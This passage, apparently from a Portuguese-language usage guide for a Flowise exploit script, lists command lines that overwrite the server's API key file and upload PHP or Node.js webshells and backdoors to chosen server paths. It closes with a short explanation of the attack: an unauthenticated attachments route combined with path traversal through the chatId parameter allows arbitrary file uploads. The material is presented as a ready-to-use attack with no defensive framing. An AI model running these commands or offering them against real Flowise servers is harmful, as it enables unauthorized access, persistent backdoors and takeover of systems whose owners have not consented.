
python flowise_exploit.py -u http://target:3000 -f new_api.json -d /root/.flowise/api.json 3. Gerar e enviar webshell automaticamente
python flowise_exploit.py -u http://target:3000 --generate-webshell php --webshell-path /var/www/html/shell.php
python flowise_exploit.py -u http://target:3000 --generate-webshell nodejs --webshell-path /tmp/backdoor.js
Princípio do ataque Explora a rota /api/v1/attachments que está na lista de permissões e não requer autenticação Executa path traversal manipulando o parâmetro chatId (../../../) Faz upload de arquivos arbitrários para qualquer local no sistema de arquivos do servidor